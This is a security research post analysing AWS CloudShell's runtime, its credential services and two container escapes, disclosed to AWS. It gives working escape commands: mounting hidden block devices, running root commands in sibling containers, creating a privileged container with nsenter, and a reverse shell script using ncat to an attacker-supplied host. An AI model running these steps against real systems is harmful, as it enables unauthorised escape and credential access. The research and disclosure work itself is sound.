News
AWS CloudShell analysis: privileged container, exposed block devices and container escape(s)
Back to NewsOSRU @ Ronin //
AWS CloudShell is a browser-based, pre-authenticated shell that you can launch directly from the AWS Management Console. It essentially is an ephemeral virtual machine with AWS CLI and other development tools pre-installed.
The successfull operation of AWS CloudShell depends on a number of things, including but not limited to credential management, service health checks, infrastructure logging (customer interactions are not logged by CloudShell), snapshots of the user’s home directory, and management of terminal sessions.
Since AWS CloudShell doesn’t provision any resources and doesn’t run in your own AWS account, and you get access to a shell where you can run commands, there’s no stopping you from trying to figure out the runtime, running processes and accessible resources.
$ ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
cloudsh+ 1 0.5 1.2 333412 32632 ? Ssl 14:05 0:00 node /var/lib/amazon/cloudshell/entrypoint.js
cloudsh+ 13 0.0 0.1 13172 2924 ? S 14:05 0:00 /bin/sh -c env | grep -m 1 AWS_REGION | grep -Eo '[a-z0-9-]*' | sudo tee /etc/yum/vars/awsregion && sudo yum -y update --security
root 19 0.0 0.2 128900 7044 ? S 14:05 0:00 sudo yum -y update --security
root 20 44.6 1.5 337824 41396 ? R 14:05 0:02 /usr/bin/python /bin/yum -y update --security
cloudsh+ 26 0.0 0.1 13172 2792 pts/0 Ss+ 14:05 0:00 /bin/bash -c cd ~ && tmux -l -f /var/lib/amazon/cloudshell/tmux.conf new-session -A -D -s 53d3a93f-2b80-4e9c-99cf-791bf8429d99
cloudsh+ 31 0.0 0.0 22360 2580 pts/0 S+ 14:05 0:00 tmux -l -f /var/lib/amazon/cloudshell/tmux.conf new-session -A -D -s 53d3a93f-2b80-4e9c-99cf-791bf8429d99
cloudsh+ 33 0.0 0.1 22508 3052 ? Ss 14:05 0:00 tmux -l -f /var/lib/amazon/cloudshell/tmux.conf new-session -A -D -s 53d3a93f-2b80-4e9c-99cf-791bf8429d99
cloudsh+ 34 0.0 0.1 13412 3340 pts/1 Ss 14:05 0:00 -bash
cloudsh+ 51 0.0 0.1 51392 3784 pts/1 R+ 14:05 0:00 ps aux
It appears that tmux
is used for terminal session management, this possibly allows managing/restoring different shell sessions across multiple tabs that CloudShell supports. We also see that root access is allowed, you should be able to run commands as root
by using sudo
.
Looking at the cgroup
for PID 1
confirms that we’re inside a docker container.
$ cat /proc/1/cgroup
11:net_cls,net_prio:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
10:devices:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
9:pids:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
8:perf_event:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
7:freezer:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
6:memory:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
5:cpuset:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
4:hugetlb:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
3:cpu,cpuacct:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
2:blkio:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
1:name=systemd:/ecs/d65374b73fef4c638c14941111bf71aa/d65374b73fef4c638c14941111bf71aa-3147462862/docker/1ed86b60f7bb8cdd0f6b30918ee7fac789e451f11e2a39f742e5025c60f9f0e4
Retrieving the instance metadata reveals that we’re inside a Firecracker microVM. Notice the Server
response header with the value Firecracker API
.
$ curl -v http://169.254.169.254/
* processing: http://169.254.169.254/
* Trying 169.254.169.254:80...
* Connected to 169.254.169.254 (169.254.169.254) port 80
> GET / HTTP/1.1
> Host: 169.254.169.254
> User-Agent: curl/8.2.1
> Accept: */*
>
< HTTP/1.1 200
< Server: Firecracker API
< Connection: keep-alive
< Content-Type: application/json
< Content-Length: 64
<
TMDSEndpoints/
containers/
roles/
stats/
task/
taskMemLimitInMiB
Another metadata API for ECS is accessible which you can use to list the running containers:
$ curl -s http://169.254.170.2/v2/metadata | jq -r '.Containers[] | "\(.Name): \(.DockerId) (\(.Image))"'
moontide-wait-for-all: d65374b73fef4c638c14941111bf71aa-65406418 (275080008720.dkr.ecr.eu-west-1.amazonaws.com/mde-base-image:flat-base-2022-10-31-ad696c3a-patched)
moontide-controller: d65374b73fef4c638c14941111bf71aa-661465391 (275080008720.dkr.ecr.eu-west-1.amazonaws.com/mde-base-image:flat-base-2022-10-31-ad696c3a-patched)
moontide-base: d65374b73fef4c638c14941111bf71aa-3147462862 (275080008720.dkr.ecr.eu-west-1.amazonaws.com/mde-base-image:flat-base-2022-10-31-ad696c3a-patched)
If you look at the DockerId
for the containers, match them to the cgroup
result we got earlier from /proc/1/cgroup
, you’ll figure out that we’re dealing with a nested container scenario. The CloudShell container that we are in is running inside another container moontide-base
Looking at the mounts within CloudShell show us typical docker mounts along with some interesting writable mounts. One such example is /aws/mde/
.
$ mount
overlay on / type overlay (rw,relatime,lowerdir=/store/task-var-lib-docker/overlay2/l/STOGWX2COR7GWT34VQNE32NJZK:/store/task-var-lib-docker/overlay2/l/QXYDLYJUXGXTVQ6RDHAVDCD4A4:/store/task-var-lib-docker/overlay2/l/SLP2GIBHAAFRRB3W2R7BLQG3GY:/store/task-var-lib-docker/overlay2/l/56IECAAWKYKWJX2XIJVZMEEWTZ:/store/task-var-lib-docker/overlay2/l/IQLJZN5LQYC5VW55PTIHB25W2H:/store/task-var-lib-docker/overlay2/l/DYERYV3UXNAM27LPQSY5JPUOOI:/store/task-var-lib-docker/overlay2/l/5DVG56VOCRLZ7ZCRPDYLZI633Z:/store/task-var-lib-docker/overlay2/l/MPK5376WSR4EQCSMJKMEG72DAA:/store/task-var-lib-docker/overlay2/l/DLQ7G6KTP5CEINIEIXDDC7EPUR:/store/task-var-lib-docker/overlay2/l/QC76JNSL3AFYGTDYIEOL7FLPDF:/store/task-var-lib-docker/overlay2/l/F7NAPWUW44JGWXPARLQKQ5DOZM,upperdir=/store/task-var-lib-docker/overlay2/0be089ce8a700c3a49ddea177c9df9dd6afcae459ea27aef8791aed9e4b67858/diff,workdir=/store/task-var-lib-docker/overlay2/0be089ce8a700c3a49ddea177c9df9dd6afcae459ea27aef8791aed9e4b67858/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
.
.
/dev/vde on /aws/mde/ide-runtimes type ext4 (rw,relatime,data=ordered)
/dev/vde on /aws/mde/mde type ext4 (rw,relatime,data=ordered)
/dev/vde on /aws/mde/credential-helper type ext4 (rw,relatime,data=ordered)
/dev/vde on /aws/mde/logs type ext4 (rw,relatime,data=ordered)
Looking at logs from /aws/mde/logs/
reveal a container for a docker image scallop-customer-image
for the CloudShell runtime being run with the name devfile-cloudshell-runtime-1
.
$ tail -12 /aws/mde/logs/devfileCommand.log
33f4ee6a8911 Extracting [==================================================>] 82.22MB/82.22MB
33f4ee6a8911 Pull complete
cloudshell-runtime Pulled
Container devfile-cloudshell-runtime-1 Creating
Container devfile-cloudshell-runtime-1 Created
Container devfile-cloudshell-runtime-1 Starting
Container devfile-cloudshell-runtime-1 Started
'{"Containers":"N/A","CreatedAt":"2023-09-26 08:16:20 +0000 UTC","CreatedSince":"30 hours ago","Digest":"sha256:5f31599ad7a35253ff57c0081bb0a385217cad862cc65f511be06a9f1d99b24e","ID":"cacec4bdbfc7","Repository":"887014871991.dkr.ecr.eu-west-1.amazonaws.com/scallop-customer-image","SharedSize":"N/A","Size":"2.86GB","Tag":"latest-patched","UniqueSize":"N/A","VirtualSize":"2.856GB"}'
Container devfile-cloudshell-runtime-1 Creating
Container devfile-cloudshell-runtime-1 Created
Container devfile-cloudshell-runtime-1 Starting
Container devfile-cloudshell-runtime-1 Started
Putting it all together, this is what we think the runtime infrastructure looks like.
Firecracker microVM
(firecracker-containerd)
|_ moontide-controller
|_ moontide-wait-for-all
|_ moontide-base -> docker
|_ scallop-customer-image
|_ tmux session
(this is what customers get access to)
Exposed Services
Running netstat
to find the listening ports reveal a bunch of services that aren’t really running on the container we’re in. These are visible and accessible because we assume that the network is shared between devfile-cloudshell-runtime-1
(the one we’re in), the parent container (moontide-base
) and it’s siblings.
$ sudo netstat -anp | grep LISTEN
tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1338 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1339 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1340 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1341 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:1342 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:51679 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3010 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3011 0.0.0.0:* LISTEN -
tcp6 0 0 :::5355 :::* LISTEN -
unix 2 [ ACC ] STREAM LISTENING 6153 - /var/run/docker.sock
unix 2 [ ACC ] STREAM LISTENING 9447 - /aws/mde/.controller/activity.sock
unix 2 [ ACC ] STREAM LISTENING 41003 - /aws/mde/.controller/activity.sock
unix 2 [ ACC ] STREAM LISTENING 41007 - /aws/mde/.controller/mde.sock
unix 2 [ ACC ] STREAM LISTENING 39189 - /run/containerd/s/5fbc156aea7531a97b62de7cf2b4d77235dd3ea97f2989125ae58b230e3aed5b
unix 2 [ ACC ] STREAM LISTENING 40473 33/tmux /tmp/tmux-1000/default
unix 2 [ ACC ] STREAM LISTENING 5407 - /var/run/docker/libnetwork/4805c2472257.sock
unix 2 [ ACC ] STREAM LISTENING 1109 - /run/systemd/journal/stdout
unix 2 [ ACC ] SEQPACKET LISTENING 1123 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 4467 - /var/lib/amazon/ssm/ipc/health
unix 2 [ ACC ] STREAM LISTENING 4469 - /var/lib/amazon/ssm/ipc/termination
unix 2 [ ACC ] STREAM LISTENING 639 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 5336 - /var/run/docker/containerd/containerd-debug.sock
unix 2 [ ACC ] STREAM LISTENING 5338 - /var/run/docker/containerd/containerd.sock.ttrpc
unix 2 [ ACC ] STREAM LISTENING 5340 - /var/run/docker/containerd/containerd.sock
unix 2 [ ACC ] STREAM LISTENING 5349 - /var/run/docker/metrics.sock
unix 2 [ ACC ] STREAM LISTENING 1510 - /run/dbus/system_bus_socket
The identification of these services is partial and was done either by inspecting the block devices or by inspecting network traffic using tcpdump
.
tcp 127.0.0.1:1340 - log credentials
tcp 127.0.0.1:1341 - control plane proxy
tcp 127.0.0.1:1342 - SSH to cloudshell container
tcp 127.0.0.1:51679 - metadata-server / DNAT from 169.254.170.2
tcp 127.0.0.1:3010 - commands (ssm talks to this)
tcp 127.0.0.1:3011 - 3010 forwards to this port
tcp 127.0.0.1:1338 - container credentials
tcp 127.0.0.1:1339 - mde API
Accessible Block Devices
lsblk
in the CloudShell console shows a couple of disks that are present but not directly mountable.
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
loop0 7:0 0 1G 0 loop /home/cloudshell-user
vda 254:0 0 2G 0 disk
vdb 254:16 0 10G 0 disk
vdc 254:32 0 10G 0 disk
vdd 254:48 0 10G 0 disk
vde 254:64 0 20.4G 0 disk /aws/mde/logs
The device nodes aren’t present in /dev
but the node entries are present in /sys/dev/block/
, the nodes can be recreated and then mounted in the CloudShell container.
# run these as root
mkdir -p /mounts/vda
mkdir -p /mounts/vdb
mkdir -p /mounts/vdc
mkdir -p /mounts/vdd
mkdir -p /mounts/vde
mknod /tmp/vda b 254 0
mknod /tmp/vdb b 254 16
mknod /tmp/vdc b 254 32
mknod /tmp/vdd b 254 48
mknod /tmp/vde b 254 64
mount -t ext4 /tmp/vda /mounts/vda
mount -t ext4 /tmp/vdb /mounts/vdb
mount -t ext4 /tmp/vdc /mounts/vdc
mount -t ext4 /tmp/vdd /mounts/vdd
mount -t ext4 /tmp/vde /mounts/vde
The contents are super interesting and after inspecting, disks were identified as:
vda - root disk for the Firecracker microVM
vdb - \
vdc - | - disks for moontide containers in the ECS task
vdd - /
vde - shared disk with mde utils
The environment variables for the moontide containers running in the task can be found at:
cat /mounts/vda/container/*/config.json | jq '.process.env'
These variables reveal how the environment is configured. They also contain auth tokens for interacting with some of the services, e.g. services exposed at ports 3010 and 3011. CVS_POLICY_TYPE
and CALLBACK_SERVICE_ENDPOINT_DNS
define the type and location of the credential service.
The following confirms that the vda
disk is the rootfs for the Firecracker microVM.
$ cat /mounts/vda/etc/image-id
image_name="amzn2-firecracker-fargate"
image_version="2"
image_arch="x86_64"
image_file="amzn2-firecracker-fargate-2.01.2023-0808-2234-x86_64.ext4"
image_stamp="8c6b-a3b1"
image_date="20230808223512"
recipe_name="amzn2 firecracker"
recipe_id="20759e13-0635-8460-33e6-6e61-356e-9be3-7326d45f"
SSM also appears to play an important role in making CloudShell work. The SSM agent logs show how the CloudShell instance gets updated and receives instructions through SSM. One would be able to see health check, update and exec-client calls.
The update calls are interesting and show details of the credential and snapshot locations.
cat /mounts/vde/_containers/*/upperdir/var/log/amazon/ssm/amazon-ssm-agent.log | grep update
2023-07-30 01:26:46 INFO [ssm-agent-worker] [MessageService] [MGSInteractor] Parsing AgentMessage 50f367f7-1030-459e-a859-747920f576de, Payload: {"schemaVersion":1,"taskId":"680947685022:1690672863717378567-0fcf795684bfd9a6a","topic":"test_topic","content":"{\"RunAsUser\":\"\",\"Parameters\":{\"command\":\"curl -X POST -H \\\"Authorization: fff...dec\\\" localhost:3010/commands/update -d eyJzb3VyY2VDb2Rl...lZmVycmVkTW91bnQiOmZhbHNlfX0\u003d\"},\"DocumentContent\":{\"schemaVersion\":\"1.0\",\"inputs\":{\"cloudWatchEncryptionEnabled\":true,\"s3EncryptionEnabled\":true,\"s3BucketName\":\"\",\"kmsKeyId\":\"\",\"s3KeyPrefix\":\"\",\"cloudWatchLogGroupName\":\"\"},\"description\":\"Document to run single interactive command on an instance\",\"sessionType\":\"InteractiveCommands\",\"parameters\":{\"command\":{\"description\":\"The command to run on the instance\",\"type\":\"String\"}},\"properties\":{\"linux\":{\"runAsElevated\":false,\"commands\":\"{{command}}\"},\"windows\":{\"runAsElevated\":false,\"commands\":\"{{command}}\"},\"macos\":{\"runAsElevated\":false,\"commands\":\"{{command}}\"}}},\"SessionOwner\":\"arn:aws:sts::680947685022:assumed-role/moontide-cell-role/1690672863717378567\",\"SessionId\":\"1690672863717378567-0fcf795684bfd9a6a\",\"DocumentName\":\"AWS-StartInteractiveCommand\"}"}
A decoded update instance message looks like this:
{
"sourceCode": null,
"s3PersistenceConfiguration": {
"snapshotObjectArn": "arn:aws:s3:::mdesnap275080008720/snapshots/887014871991/{environmentId}/home",
"sizeInGiB": null
},
"credentialsS3ObjectARN": "arn:aws:s3:::mdecred275080008720/credentials/887014871991/{environmentId}/aws",
"taskIDS3ObjectARN": "arn:aws:s3:::mdesnap275080008720/taskids/887014871991/{environmentId}/taskid",
"maximumRuntimeMinutes": 1210,
"inactivityTimeoutMinutes": 0,
"externalID": "{environmentId}",
"instanceType": "ENVIRONMENT",
"clientID": "887014871991",
"kmsKeyArn": "arn:aws:kms:eu-west-1:887014871991:key/{keyId}",
"environmentARN": "arn:aws:mde:eu-west-1:887014871991:/environments/{environmentId}",
"Ides": null,
"enableCawsCredentialsLoading": false,
"enableCredentialsUpdater": true,
"envConfig": {
"instanceId": "{instanceId}",
"externalId": "{environmentId}",
"warmPoolId": "wp-3d8d006f0aa54475a623419ccbd580e5",
"clientId": "887014871991",
"instanceType": "ENVIRONMENT",
"maximumRuntimeInMinutes": 1210,
"commandRunnerToken": "fff...dec",
"credentialsUpdaterEnabled": true,
"ssh": {
"port": 1342
},
"customerMetrics": {
"enabled": false
},
"customerLogs": {
"enabled": false
},
"httpProxyConfig": {
"enabled": false,
"httpProxyAccountId": "314344395930",
"throttlingEnabled": false
},
"inactivity": {
"type": "NETWORK",
"timeoutInMinutes": 0
},
"inactivityTrackingType": "NETWORK",
"s3Persistence": {
"snapshotObjectArn": "arn:aws:s3:::mdesnap275080008720/snapshots/887014871991/{environmentId}/home",
"sizeInBytes": 0,
"KMSKeyArn": "arn:aws:kms:eu-west-1:887014871991:key/{keyId}",
"taskIdObjectArn": "arn:aws:s3:::mdesnap275080008720/taskids/887014871991/{environmentId}/taskid",
"mountPoint": "/cloudshell-user-home:/home/cloudshell-user"
},
"waitDeferredMount": false
}
}
Credentials
Task Credentials
The credentials for the following roles can be obtained from the Firecracker metadata service:
arn:aws:sts::{cloudshellAccount}:assumed-role/moontide-task-role-control-plane/{instanceId}
arn:aws:sts::{cloudshellAccount}:assumed-role/moontide-task-execution-role/{instanceId}
The task role has access to pull mde-base-image
which is expected. This image is used for all three containers in the task.
User Credentials
When a cloudshell:PutCredentials
call is made from the browser or AWS CLI, it stores these credentials in a remote credential store against the specific CloudShell instance which can later be retrieved by the credential services within CloudShell.
One such remote credential store exists at https://kztbj7an49.execute-api.eu-west-1.amazonaws.com/prod (for eu-west-1
), the endpoint /{instanceId}/credentials/role
is used to fetch credentials stored by the cloudshell:PutCredentials
call. This request must be signed with moontide-task-role-control-plane
credentials.
This endpoint was identified by inspecting the env
variable CALLBACK_SERVICE_ENDPOINT_DNS
for one of the parent containers. You might also be able to see it if you inspect the network traffic.
If you look at env
within CloudShell, you’ll see that AWS_CONTAINER_CREDENTIALS_FULL_URI
points to a local service. The AWS CLI uses the value in the variable to get container credentials as highlighted in the AWS documentation.
AWS_CONTAINER_CREDENTIALS_FULL_URI=http://localhost:1338/latest/meta-data/container/security-credentials
The service at port 1338
then calls the remote credential store specified above to fetch the user credentials.
AWS CLI/SDK -> localhost:1338 -> remote credential store
Other Credentials
The credential service described above is also used to fetch other credentials necessary for the CloudShell operations.
/{instanceId}/credentials/logs
-arn:aws:sts::{cloudshellAccount}:assumed-role/MDEBootstrapRole/logs_{environmentId}
/{instanceId}/credentials/docker
-arn:aws:sts::{cloudshellAccount}:assumed-role/MDEBootstrapRole/ecr_{environmentId}
- used for pullingscallop-customer-image
/{instanceId}/credentials/snapshot
-arn:aws:sts::{cloudshellAccount}:assumed-role/moontide-snapshot-role-control-plane/snapshot_{environmentId}
- manages the cloudshell home directory snapshot in S3/{instanceId}/credentials/hightideRole
-arn:aws:sts::{cloudshellAccount}:assumed-role/HightideS3LoggingRole/hightidelogs_{environmentId}
Container Escape(s)
After analysing the vda
disk, we can see that the Firecracker microVM receives instructions from containerd through the Firecracker agent. The agent exposes a VSOCK socket at port 10789
and runs a TTRPC server.
The CloudShell container can also access this VSOCK socket using CID 0
.
Agent TTRPC Services
The following services are exposed by the firecracker-containerd agent over VSOCK. These are intended to be used by the firecracker-containerd
service on an actual host hosting the microVMs.
aws.firecracker.containerd.eventbridge.getter/GetEvent
containerd.task.v2.Task/State
containerd.task.v2.Task/Create
containerd.task.v2.Task/Start
containerd.task.v2.Task/Delete
containerd.task.v2.Task/Pids
containerd.task.v2.Task/Pause
containerd.task.v2.Task/Resume
containerd.task.v2.Task/Checkpoint
containerd.task.v2.Task/Kill
containerd.task.v2.Task/Exec
containerd.task.v2.Task/ResizePty
containerd.task.v2.Task/CloseIO
containerd.task.v2.Task/Update
containerd.task.v2.Task/Wait
containerd.task.v2.Task/Stats
containerd.task.v2.Task/Connect
containerd.task.v2.Task/Shutdown
IOProxy/State
IOProxy/Attach
DriveMounter/MountDrive
DriveMounter/UnmountDrive
We wrote a simple CLI to interact with the Firecracker agent, it can be found at: https://github.com/dehydr8/firecracker-containerd-agent-client/
./firecracker-containerd-agent-client call --service containerd.task.v2.Task --method Pids '{"id":"<container-id>"}'
2023/07/30 02:04:15 {"processes":[{"pid":1061},{"pid":1073},{"pid":1122},{"pid":1123},{"pid":1124},{"pid":1130},{"pid":1140},{"pid":1179},{"pid":13654},{"pid":13655},{"pid":29376},{"pid":29384}]}
Escaping to the moontide containers
Escaping is easy as we can execute any command in any of the running containers using containerd.task.v2.Task/Exec
.
The command output can be seen in two ways:
- Since we already have access to the Firecracker microVM rootfs at
vda
, we can supply any path under/tmp
as ourstdout
andstderr
. We can later read it at/mounts/vda/tmp/<exec-id>.stdout
firecracker-containerd-agent-client
now has support for IOProxy which uses VSOCK ports for forwardingstdin
,stdout
andstderr
# without IO proxy
$ ./firecracker-containerd-agent-client exec --container_id <container> /usr/bin/id
2023/09/26 14:33:54 Execution ID: a678160d-3719-4c1a-8d64-eb8488f91286
2023/09/26 14:33:55 Exec call successfull, starting process...
2023/09/26 14:33:56 Command executed with PID: 12263
$ cat /mounts/vda/tmp/a678160d-3719-4c1a-8d64-eb8488f91286.stdout
uid=0(root) gid=0(root) groups=0(root)
# with IO proxy
$ ./firecracker-containerd-agent-client exec --container_id <container> --io /usr/bin/id
2023/09/26 14:35:33 Execution ID: 34bf4762-44ff-4821-81ab-891fc76ebab8
2023/09/26 14:35:34 Proxy attached...
2023/09/26 14:35:34 Exec call successfull, starting process...
2023/09/26 14:35:35 Command executed with PID: 12984
uid=0(root) gid=0(root) groups=0(root)
An interactive shell can be opened using the IOProxy support along with --tty
.
$ export MDE_BASE_CONTAINER=$(curl -s http://169.254.170.2/v2/metadata | jq -r '.Containers[] | select(.Name=="moontide-base") | .DockerId')
$ ./firecracker-containerd-agent-client exec --container_id $MDE_BASE_CONTAINER --io --tty /usr/bin/bash
2023/09/26 14:37:28 Execution ID: d15c9a0d-8d42-4fe7-9a0c-38187e4d90c6
2023/09/26 14:37:29 Proxy attached...
2023/09/26 14:37:29 Exec call successfull, starting process...
2023/09/26 14:37:29 Command executed with PID: 13810
bash-4.2# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
5f6aad52847e 887014871991.dkr.ecr.eu-west-1.amazonaws.com/scallop-customer-image:latest-patched "node /var/lib/amazo…" 4 minutes ago Up 4 minutes devfile-cloudshell-runtime-1
bash-4.2# cat /etc/image-id
image_name="amzn2-container-raw"
image_version="2"
image_arch="x86_64"
image_file="amzn2-container-raw-2.0.20230822.0-x86_64"
image_stamp="35bb-cd11"
image_date="20230822182528"
recipe_name="amzn2 container"
recipe_id="11ed84f7-ea52-6dd5-259b-f269-e79c-e2eb-155c2d3f"
Escaping to the Firecracker microVM
The Firecracker microVM runs in a jailed environment on the underlying host. This microVM is responsible for running the ECS tasks being orchestrated by firecracker-containerd
, which means running the moontide containers for CloudShell. Each microVM instance is unique to the customer’s CloudShell session and gets destroyed shortly after.
Escaping to it can be done in two ways:
- Supplying a custom binary path for
stdout
when running a command. This binary must be present on the microVM. - Creating a new privileged container with
pid=host
and escaping to the host namespace.
The Hard Way
If we look at the state for the root execution (empty string) of any of the containers, we see:
$ ./firecracker-containerd-agent-client call --service containerd.task.v2.Task --method State '{"id":"{containerId}"}'
2023/07/30 02:13:50 {"id":"{containerId}","bundle":"/container/{containerId}","pid":1061,"status":2,"stdout":"binary:///sbin/shim-loggers-for-containerd?--awslogs-create-group=...--mode=blocking","stderr":"binary:///sbin/shim-loggers-for-containerd?--awslogs-create-group=...--mode=blocking","exited_at":{"seconds":-62135596800}}
The stdout
and stderr
are being sent to the /sbin/shim-loggers-for-containerd
binary on the Firecracker microVM. In Exec
, we can supply our own binary paths to handle these streams. To make it easier, since we already have access to vda
, we can place the ncat
executable and a file (let’s call it rsh.sh
) in /tmp
with the following contents:
#!/bin/bash
/tmp/ncat <ip> <port> -e /bin/bash &
Make them executable and then run:
$ ./firecracker-containerd-agent-client exec --container_id <any-container-id> --stdout binary:///tmp/rsh.sh /usr/bin/id
# we should get a reverse shell from the Firecracker microVM
$ ls -lah /
total 77K
dr-xr-xr-x 21 root root 4.0K Jul 30 00:54 .
dr-xr-xr-x 21 root root 4.0K Jul 30 00:54 ..
lrwxrwxrwx 1 root root 7 Jun 29 01:41 bin -> usr/bin
dr-xr-xr-x 2 root root 4.0K Apr 9 2019 boot
drwxrwxrwx 5 root root 4.0K Jul 30 00:56 container
drwxr-xr-x 11 root root 2.6K Jul 30 00:54 dev
drwxr-xr-x 51 root root 4.0K Jun 29 01:41 etc
drwxr-xr-x 2 root root 4.0K Apr 9 2019 home
lrwxrwxrwx 1 root root 7 Jun 29 01:41 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jun 29 01:41 lib64 -> usr/lib64
drwxr-xr-x 2 root root 4.0K Jun 29 01:41 local
drwx------ 2 root root 16K Jun 29 01:41 lost+found
drwxr-xr-x 2 root root 4.0K Apr 9 2019 media
drwxr-xr-x 2 root root 4.0K Apr 9 2019 mnt
drwxr-xr-x 2 root root 4.0K Apr 9 2019 opt
dr-xr-xr-x 128 root root 0 Jul 30 00:54 proc
dr-xr-x--- 2 root root 4.0K Apr 9 2019 root
drwxr-xr-x 15 root root 360 Jul 30 00:54 run
lrwxrwxrwx 1 root root 8 Jun 29 01:41 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Apr 9 2019 srv
dr-xr-xr-x 12 root root 0 Jul 30 00:54 sys
drwxrwxrwt 9 root root 4.0K Jul 30 02:22 tmp
drwxr-xr-x 13 root root 4.0K Jun 29 01:41 usr
drwxr-xr-x 18 root root 4.0K Jul 30 00:54 var
drwxr-xr-x 11 root root 1.0K Jul 30 00:54 volume
The Easy Way
We can instruct the Firecracker agent to create a new runc
container with elevated privileges. To do this, we must first have access to an image bundle and a rootfs
. Since we can’t really pull new images*, we must use the existing ones that are present on the microVM.
* We were able to find a bi-directional path with read/write access from the CloudShell container all the way down to the microVM. We can technically create a bundle/rootfs for any custom image that we want to run. The path /aws/mde/logs
on CloudShell translates to /volume/mde-volume/logs
on the microVM.
# prepare a dummy rootfs dir
mkdir -p /aws/mde/logs/123/rootfs
# select a target container for using its rootfs
export TARGET_CONTAINER=$(curl -s http://169.254.170.2/v2/metadata | jq -r '.Containers[] | select(.Name=="moontide-wait-for-all") | .DockerId')
# create container using the target container fs
./firecracker-containerd-agent-client create \
--id escaped-123 \
--priv \
--bundle /volume/mde-volume/logs/123 \
--rootfs-config '{"type":"overlay","target":"/","options":["lowerdir=/container/'$TARGET_CONTAINER'/rootfs", "upperdir=/volume/_containers/'$TARGET_CONTAINER'/upperdir", "workdir=/volume/_containers/'$TARGET_CONTAINER'/workdir"]}' \
--mounts-config '[{"type":"bind","destination":"/dev/init","source":"/sbin/tini","options":["bind","ro"]}]' \
--pid /proc/1/ns/pid \
/dev/init -- /usr/bin/sleep infinity
# enter namespace of PID 1 and run bash
./firecracker-containerd-agent-client exec --container_id escaped-123 --priv --io --tty /usr/bin/nsenter -t 1 -m -u -n -i bash
2023/09/26 14:53:24 Execution ID: 1a70786c-554f-4e0a-954e-e881c81820ab
2023/09/26 14:53:25 Proxy attached...
2023/09/26 14:53:25 Exec call successfull, starting process...
2023/09/26 14:53:25 Command executed with PID: 20496
bash-4.2# id
uid=0(root) gid=0(root) groups=0(root)
bash-4.2# cat /etc/image-id
image_name="amzn2-firecracker-fargate"
image_version="2"
image_arch="x86_64"
image_file="amzn2-firecracker-fargate-2.01.2023-0808-2234-x86_64.ext4"
image_stamp="8c6b-a3b1"
image_date="20230808223512"
recipe_name="amzn2 firecracker"
recipe_id="20759e13-0635-8460-33e6-6e61-356e-9be3-7326d45f"
NOTE: The underlying CloudShell Firecracker VM image is a stripped down amazonlinux2, it doesn’t have the utils that you might expect (e.g.
ps
,ip
, etc) and also doesn’t contain a package manager. To installyum
, use the commands in this gist: https://gist.github.com/dehydr8/9b2859611092ccc3239efeef6b7d7f02You can then use
yum
to install the packages you want.
Comments from Ronin & AWS Security
Even though we can get credentials for all the underlying roles that make CloudShell work and even after escaping to the parent containers and the host microVM, we’re still isolated to our own instance/environment. We haven’t really enumerated the credentials for all of the permissions but they appear to be scoped to the running instance/environment.
The findings were reported to AWS Security on Jul 31, 2023. Here’s their comment:
The service team has carefully reviewed your submission and confirmed that all data you were able to enumerate, including disk contents, SSM agent logs, environment variables, etc. are relevant only to your specific CloudShell environment and are known to be visible to the CloudShell user. All credentials enumerated on the host are scoped-down to the single CloudShell instance and can’t be used to access anything other than a customer’s own CloudShell, of which they have full control of already.
Acknowledgements
We want to express our sincere gratitude to Konrad T. and the AWS Security Outreach team for always being a pleasure to deal with.